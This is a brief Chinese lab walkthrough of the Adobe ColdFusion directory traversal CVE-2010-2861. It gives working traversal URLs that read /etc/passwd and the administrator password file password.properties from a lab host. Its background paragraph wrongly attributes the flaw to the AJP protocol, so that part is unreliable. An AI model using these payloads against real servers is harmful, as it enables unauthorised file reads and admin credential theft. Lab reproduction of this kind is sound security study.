Adobe ColdFusion 文件读取漏洞(CVE-2010-2861)

漏洞原理

Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品，其运行的CFML（ColdFusion Markup Language）是针对Web应用的一种程序设计语言。由于AJP协议设计存在缺陷导致内部相关的属性可控，攻击者可以构造属性值，使未授权的用户读取服务器任意文件获得敏感信息，甚至可以进行远程代码执行漏洞的利用。
Adobe ColdFusion 8、9版本中皆存在一处目录穿越漏洞。

一、环境搭建

二、访问

三、输入admin初始化环境

四、证明漏洞存在

http://your-ip:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../etc/passwd%00en

五、漏洞利用，读取管理员密码

http://your-ip:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en

管理员密码获取到了，就可以正常玩耍了！?